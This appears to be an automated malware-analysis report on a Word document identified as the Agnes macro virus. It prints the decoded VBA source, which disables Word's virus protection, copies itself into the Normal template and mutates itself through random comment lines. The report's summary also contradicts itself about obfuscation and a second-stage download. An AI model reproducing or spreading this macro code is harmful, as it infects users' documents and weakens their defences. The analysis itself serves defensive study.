Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Agnes-5. It contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The macro attempts to disable security features like macro warnings and virus protection, and its obfuscated nature suggests it is designed to download or execute a second-stage payload.
Heuristics (4)

- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19056 bytes |

SHA-256: b5ccc528004f1e879ce26940d3d1c7785daee6c9f7ba2d4c31ccf635713a8d65

Detection (ClamAV): Doc.Trojan.Agnes-5
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AL"
Sub RuLeQp9075()
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Randomize
ActiveLines = Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule.CountOfLines
If ActiveLines > 300 Then
With Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule
For TheLine = 1 To .CountOfLines
If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
Next TheLine
End With
Else
With Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule
PolySize = Int(Rnd * 10)
For PolyMorphic = 1 To PolySize
PolyString = ""
PolyLines = .CountOfLines
RndLine = Int(Rnd * PolyLines) + 1
StringSize = Int(Rnd * 39) + 1
For SomeString = 1 To StringSize
PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
Next SomeString
.InsertLines RndLine, "Rem " & PolyString
Next PolyMorphic
End With
End If
If Day(Now()) = 10 Then
Application.Caption = "AGNES LEE"
End If
Application.CommandBars("View").Controls(6).Delete
Application.CommandBars("Format").Controls(12).Delete
Application.CommandBars("Tools").Controls(12).Delete
Application.CommandBars("Tools").Controls(13).Delete
End Sub
Sub Tl569()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("AL").Export "C:\AL.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.AL" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 18288-Tl-5699075-Lm.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "AL" Then RfEfVg8187VhPkUu569 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "AL" Then VlCjMk457RuLeQp9075 = True
Next y
If RfEfVg8187VhPkUu569 = True And VlCjMk457RuLeQp9075 = False Then Set TkErNq244PwQuUk36 = ActiveDocument.VBProject
If RfEfVg8187VhPkUu569 = False And VlCjMk457RuLeQp9075 = True Then Set TkErNq244PwQuUk36 = NormalTemplate.VBProject
If RfEfVg8187VhPkUu569 = True And VlCjMk457RuLeQp9075 = True Then GoTo Ende_
TkErNq244PwQuUk36.VBComponents.Import "C:\AL.sys"
If VlCjMk457RuLeQp9075 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If RfEfVg8187VhPkUu569 = False Then NormalTemplate.Save
Ende_:
Call RuLeQp9075
End Sub
Rem ExKfKzQmJwLyTlNwAoKrVgBxNjMjKeNqCoRlMgUkCkKnHjEhItTrJtPpJsJwHrGmAvKsBnTfLvPoNo
Sub AutoOpen()
On Error Resume Next
Call Tl569
Call RuLeQp9075
Rem Gj
End Sub
Sub AutoExit()
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub AutoNew()
Rem JhCeSoNtPfLxPmTpSwUnAvAqFqSwTrNeArUsFfMzUi
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub AutoExec()
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Tl569
Call RuLeQp9075
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Rem IgHmRoExKsFqGgTyAhQnLkEoDmMtFrFpFgJzOlKr
Call Tl569
```

... (truncated)